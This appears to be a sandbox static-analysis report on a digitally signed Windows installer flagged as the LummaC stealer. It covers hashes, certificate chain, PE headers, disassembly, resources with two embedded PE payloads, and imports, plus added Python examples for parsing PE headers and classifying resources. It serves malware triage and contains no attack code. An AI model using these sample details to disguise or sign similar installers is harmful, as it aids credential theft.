                                                                                                                                                                                                                                                  SHA256:276b08cdfcba38b36290db8a3162df343ba0f2bc3d3e48d22928ae61480b8183
                                                                                                                                                                                                                                                  SHA512:b34e7dee552a1698506ebb6475c1aade0be79a3d153203d9711c706dafa770336f2b7392cc3f6d71e8133bc7acd7bf062b5781a19cac41d6360bca10513987eb
                                                                                                                                                                                                                                                  SSDEEP:24576:WnbxPImgK4brDi4IxgRqzwqNb+Yz73P2EMZbG0JEtMOfPpqx9KWO1tYG54M5SeE:cNeKh4nqzF3PYdStMOfP8g15HEeE
                                                                                                                                                                                                                                                  TLSH:F8757C22A3E24833D4731F759D6B86846E357D202EA4968E7EF8DE4C0E35B40BD35396
                                                                                                                                                                                                                                                  File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                                                  Icon Hash:0e07030361cd6d38
                                                                                                                                                                                                                                                  Entrypoint:0x5025d8
                                                                                                                                                                                                                                                  Entrypoint Section:.itext
                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                  Time Stamp:0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                  Import Hash:f62b90e31eca404f228fcf7068b00f31
                                                                                                                                                                                                                                                  Signature Valid:true
                                                                                                                                                                                                                                                  Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                                                                                                                                                                  Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                  Error Number:0
Not Before: 26/11/2024 13:07:48
Not After: 26/11/2025 13:07:47
                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                  • CN=T H SUPPORT SERVICES LTD, O=T H SUPPORT SERVICES LTD, STREET=Suites 10s And 11s Trafford House Chester Road, PostalCode=M32 0RS, L=Stretford, S=Greater Manchester, C=GB, SERIALNUMBER=07890919, OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                  Thumbprint MD5:99CC43DD50C8C235E6703FBFE86B0302
                                                                                                                                                                                                                                                  Thumbprint SHA-1:21297766029D043DFBA740CD5203E45171FC8EAA
                                                                                                                                                                                                                                                  Thumbprint SHA-256:0A2CAAF3A1E6490DE521CCCA8452705AF0BD9A4A91D7F02CD8D3588404BCF77C
                                                                                                                                                                                                                                                  Serial:502F183B00B497DFC821D09DEB30526B
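The static block above packs several triage-relevant facts into single lines: the link timestamp 0x5B226D52 (June 2018) against a code-signing certificate issued 26/11/2024, RELOCS_STRIPPED with no DYNAMIC_BASE (the image can only load at 0x400000, so no ASLR), and an entry point in `.itext` rather than `.text`. The code below is an added example, not from the report or the sample: a standard-library PE header parser that decodes those fields and resolves which section holds the entry point. It runs against a constructed stub PE whose header values echo the report (entry point, image base, characteristics, timestamp); the section layout in the stub is an assumption, not the real file's.

```python
# Added example (not from the Joe Sandbox report): decode the PE fields the
# report's static section summarizes. Standard library only. The stub PE is
# constructed here and only echoes the report's header values; its section
# layout is assumed, not taken from the real sample.
import struct
from datetime import datetime, timezone

FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0080: "BYTES_REVERSED_LO",
    0x0100: "32BIT_MACHINE", 0x2000: "DLL", 0x8000: "BYTES_REVERSED_HI",
}
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}


def flag_names(value: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> FILE_HEADER -> OPTIONAL_HEADER -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:      # PE32: ImageBase is a u32 at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:    # PE32+: ImageBase is a u64 at +24 (no BaseOfData field)
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    os_major = struct.unpack_from("<H", data, opt + 40)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset for PE32 and PE32+
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize = struct.unpack_from("<8sIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, max(vsize, rawsize)))
    entry_section = next((n for n, va, sz in sections if va <= entry_rva < va + sz), None)
    return {
        "machine": machine,
        "timestamp": ts,
        "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "characteristics": flag_names(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "aslr": bool(dll_chars & 0x0040) and not (chars & 0x0001),
        "os_version_major": os_major,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "entrypoint_va": image_base + entry_rva,
        "entry_section": entry_section,
        "sections": [n for n, _, _ in sections],
    }


def build_stub_pe() -> bytes:
    """Constructed PE32 stub echoing the report's header values; section layout is assumed."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    sections = [(b".text", 0x1000, 0x100000), (b".itext", 0x101000, 0x2000), (b".data", 0x103000, 0x1000)]
    opt_size = 224   # PE32 optional header incl. 16 data directories
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x5B226D52, 0, 0, opt_size, 0x818F)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, 0x5025D8 - 0x400000)   # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)              # ImageBase
    struct.pack_into("<H", opt, 40, 5)                     # MajorOperatingSystemVersion
    struct.pack_into("<H", opt, 68, 2)                     # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<H", opt, 70, 0x8100)                # NX_COMPAT | TERMINAL_SERVER_AWARE
    sec_tbl = b"".join(
        struct.pack("<8sIIIIIIHHI", name, size, va, size, 0, 0, 0, 0, 0, 0x60000020)
        for name, va, size in sections
    )
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + sec_tbl


if __name__ == "__main__":
    for k, v in parse_pe(build_stub_pe()).items():
        print(f"{k}: {v:#x}" if isinstance(v, int) and k != "timestamp" else f"{k}: {v}")
```

Two caveats when reading the decoded values. The link timestamp is written by the linker and is trivially set to any value, so a 2018 stamp on a file signed with a certificate valid from 26/11/2024 is a prompt to look closer, not evidence by itself. And "Signature Valid: true" only means the Authenticode chain verified against the Certum EV CA; it says nothing about the signer's intent, which is why the report can show a valid EV signature and a LummaC detection on the same sample.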
                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                  add esp, FFFFFFF0h
                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                  mov eax, 00500930h
                                                                                                                                                                                                                                                  call 00007F7B88D9AF16h
push FFFFFFECh
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov ebx, dword ptr [eax+00000170h]
push ebx
call 00007F7B88D9BDC1h
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
mov eax, dword ptr [00505E5Ch]
push ebx
call 00007F7B88D9C016h
xor eax, eax
push ebp
push 00502653h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007F7B88D9B761h
call 00007F7B88E925FCh
mov eax, dword ptr [00500568h]
push eax
push 005005CCh
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
call 00007F7B88E0E3EDh
call 00007F7B88E92650h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007F7B88E945CBh
jmp 00007F7B88D9663Dh
call 00007F7B88E923CCh
mov eax, 00000001h
call 00007F7B88D970FEh
call 00007F7B88D96A81h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov edx, 005027E8h
call 00007F7B88E0DEF8h
push 00000005h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000170h]
push eax
call 00007F7B88D9BFD7h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [004DACA0h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10e000 | 0x3840 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x114000 | 0x81e00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x18a600 | 0x2950 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x113000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10ea80 | 0x88c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xffdc8 | 0xffe00 | 680bf2b0bd4a28b3d7352f45ff6c3fcd | False | 0.4816328010503175 | data | 6.4785274378109845 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x101000 | 0x17f4 | 0x1800 | 8e0d52126a75001416d71c23878be2c1 | False | 0.5244140625 | data | 6.003729381717893 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x103000 | 0x308c | 0x3200 | c2acc8e96fc244753abd1d87bb624bc0 | False | 0.425078125 | data | 4.3575606000501415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x107000 | 0x6198 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x10e000 | 0x3840 | 0x3a00 | 0e1e8128f777a5ff18a144305a4fb39c | False | 0.3108836206896552 | data | 5.2048781278956655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x112000 | 0x3c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x113000 | 0x18 | 0x200 | 9cf98ea6bb17a35d99fa770a2e9a8ff0 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q" | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x114000 | 0x81e00 | 0x81e00 | bf317f12b51dcfd180a4b039a5f110fa | False | 0.6202233968960539 | data | 7.394129607186501 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x114d64 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x114e98 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x114fcc | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x115100 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x115234 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x115368 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x11549c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x1155d0 | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 | | | 0.2945859872611465
RT_BITMAP | 0x115ab8 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.521551724137931
RT_ICON | 0x115ba0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.527027027027027
RT_ICON | 0x115cc8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.5
RT_ICON | 0x115fb0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.4115853658536585
RT_ICON | 0x116618 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.4277456647398844
RT_ICON | 0x116b80 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.601985559566787
RT_ICON | 0x117428 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.5378464818763327
RT_ICON | 0x1182d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.6914893617021277
RT_ICON | 0x118738 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.5311913696060038
RT_ICON | 0x1197e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.46846473029045643
RT_ICON | 0x11bd88 | 0xc66c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9978935349240098
RT_STRING | 0x1283f4 | 0xec | data | | | 0.6059322033898306
RT_STRING | 0x1284e0 | 0x250 | data | | | 0.47466216216216217
RT_STRING | 0x128730 | 0x28c | data | | | 0.4647239263803681
RT_STRING | 0x1289bc | 0x3e4 | data | | | 0.4347389558232932
RT_STRING | 0x128da0 | 0x9c | data | | | 0.717948717948718
RT_STRING | 0x128e3c | 0xe8 | data | | | 0.6293103448275862
RT_STRING | 0x128f24 | 0x468 | data | | | 0.3820921985815603
RT_STRING | 0x12938c | 0x38c | data | | | 0.3898678414096916
RT_STRING | 0x129718 | 0x3dc | data | | | 0.39271255060728744
RT_STRING | 0x129af4 | 0x360 | data | | | 0.37037037037037035
RT_STRING | 0x129e54 | 0x40c | data | | | 0.3783783783783784
RT_STRING | 0x12a260 | 0x108 | data | | | 0.5113636363636364
RT_STRING | 0x12a368 | 0xcc | data | | | 0.6029411764705882
RT_STRING | 0x12a434 | 0x234 | data | | | 0.5070921985815603
RT_STRING | 0x12a668 | 0x3c8 | data | | | 0.3181818181818182
RT_STRING | 0x12aa30 | 0x32c | data | | | 0.43349753694581283
RT_STRING | 0x12ad5c | 0x2a0 | data | | | 0.41964285714285715
RT_RCDATA | 0x12affc | 0x82e8 | data | English | United States | 0.11261637622344235
RT_RCDATA | 0x1332e4 | 0x10 | data | | | 1.5
RT_RCDATA | 0x1332f4 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333
RT_RCDATA | 0x134af4 | 0x6bc | data | | | 0.6467517401392111
RT_RCDATA | 0x1351b0 | 0x5b10 | PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows | English | United States | 0.3255404941660947
RT_RCDATA | 0x13acc0 | 0x125 | Delphi compiled form 'TMainForm' | | | 0.7508532423208191
RT_RCDATA | 0x13ade8 | 0x3a2 | Delphi compiled form 'TNewDiskForm' | | | 0.524731182795699
RT_RCDATA | 0x13b18c | 0x320 | Delphi compiled form 'TSelectFolderForm' | | | 0.53625
RT_RCDATA | 0x13b4ac | 0x300 | Delphi compiled form 'TSelectLanguageForm' | | | 0.5703125
RT_RCDATA | 0x13b7ac | 0x5d9 | Delphi compiled form 'TUninstallProgressForm' | | | 0.4562458249832999
                                                                                                                                                                                                                                                  RT_RCDATA0x13bd880x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                                                                                                                                                                  RT_RCDATA0x13c1ec0x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2a80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2bc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2e40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                  RT_GROUP_ICON0x13e30c0x92dataEnglishUnited States0.636986301369863
                                                                                                                                                                                                                                                  RT_VERSION0x13e3a00x15cdataEnglishUnited States0.5689655172413793
                                                                                                                                                                                                                                                  RT_MANIFEST0x13e4fc0x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
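The two RT_RCDATA entries typed as PE images (an x86-64 console executable at RVA 0x1332f4 and a 32-bit GUI DLL at RVA 0x1351b0) are the payloads worth carving out of this sample for separate analysis. The following Python is an added example, not code from the report or from Joe Sandbox: it reproduces a simplified form of the type labels in the table from the raw bytes of a resource payload (PE format, DLL flag, subsystem and machine; binary Delphi form class name; XML). The resource payloads it runs on are constructed header-only stand-ins, since the real blobs are not on the page.

```python
"""Classify PE resource payloads the way the resource table above does.
Added example, not code from the sandbox report; the sample payloads at the
bottom are constructed so it runs offline."""
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000          # Characteristics bit: image is a DLL
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SUBSYSTEMS = {2: "GUI", 3: "console"}
ARCHS = {IMAGE_FILE_MACHINE_I386: "Intel 80386", IMAGE_FILE_MACHINE_AMD64: "x86-64"}


def classify_resource(data: bytes) -> str:
    """Return a libmagic-style label for a resource blob: embedded PE image,
    binary Delphi form, XML document, or plain 'data'."""
    # Embedded PE: DOS header with e_lfanew at 0x3C, 'PE\0\0', a 20-byte COFF
    # header, then the optional header. The Subsystem field is at offset 68 of
    # the optional header in both the PE32 and the PE32+ layout.
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        opt = e_lfanew + 4 + 20
        if data[e_lfanew:e_lfanew + 4] == b"PE\0\0" and len(data) >= opt + 70:
            machine, _, _, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
            magic = struct.unpack_from("<H", data, opt)[0]
            subsystem = struct.unpack_from("<H", data, opt + 68)[0]
            fmt = "PE32+" if magic == PE32PLUS_MAGIC else "PE32"
            kind = "(DLL) " if chars & IMAGE_FILE_DLL else ""
            sub = SUBSYSTEMS.get(subsystem, f"subsystem {subsystem}")
            arch = ARCHS.get(machine, f"machine 0x{machine:04x}")
            return f"{fmt} executable {kind}({sub}) {arch}"
    # Binary Delphi form (.dfm): 'TPF0' signature followed by the form class
    # name as a length-prefixed string.
    if data[:4] == b"TPF0" and len(data) > 5:
        n = data[4]
        cls = data[5:5 + n].decode("latin-1")
        return f"Delphi compiled form '{cls}'"
    if data.lstrip(b"\xef\xbb\xbf")[:5] == b"<?xml":
        return "XML document"
    return "data"


def find_embedded_pes(resources):
    """resources: iterable of (name, payload). Returns the names whose payload
    is a PE image; these are the entries to carve out and analyse on their own."""
    return [name for name, blob in resources if classify_resource(blob).startswith("PE32")]


def _fake_pe(machine, subsystem, dll=False, plus=False) -> bytes:
    """Constructed sample: a header-only PE image carrying just the fields the
    classifier reads (not a loadable file)."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    chars = 0x0002 | (IMAGE_FILE_DLL if dll else 0)               # 0x0002 = EXECUTABLE_IMAGE
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 240, chars)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if plus else PE32_MAGIC)
    struct.pack_into("<H", opt, 68, subsystem)
    return dos + b"PE\0\0" + coff + bytes(opt)


# Constructed stand-ins for the RT_RCDATA / RT_MANIFEST entries listed above.
SAMPLE_RESOURCES = [
    ("RT_RCDATA@0x12affc", b"\x00" * 64),
    ("RT_RCDATA@0x1332f4", _fake_pe(IMAGE_FILE_MACHINE_AMD64, 3, plus=True)),
    ("RT_RCDATA@0x1351b0", _fake_pe(IMAGE_FILE_MACHINE_I386, 2, dll=True)),
    ("RT_RCDATA@0x13acc0", b"TPF0\x09TMainForm\x08MainForm\x00"),
    ("RT_MANIFEST@0x13e4fc", b'<?xml version="1.0" encoding="UTF-8"?><assembly/>'),
]

if __name__ == "__main__":
    for name, blob in SAMPLE_RESOURCES:
        print(f"{name:22} {classify_resource(blob)}")
    print("embedded PE images:", find_embedded_pes(SAMPLE_RESOURCES))
```

On a real file the payloads would come from walking the resource directory (for instance with pefile's `DIRECTORY_ENTRY_RESOURCE` and `get_data(rva, size)`, using the RVA and Size columns above); the classifier itself only needs the bytes.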
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll | CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll | AlphaBlend
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll | WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
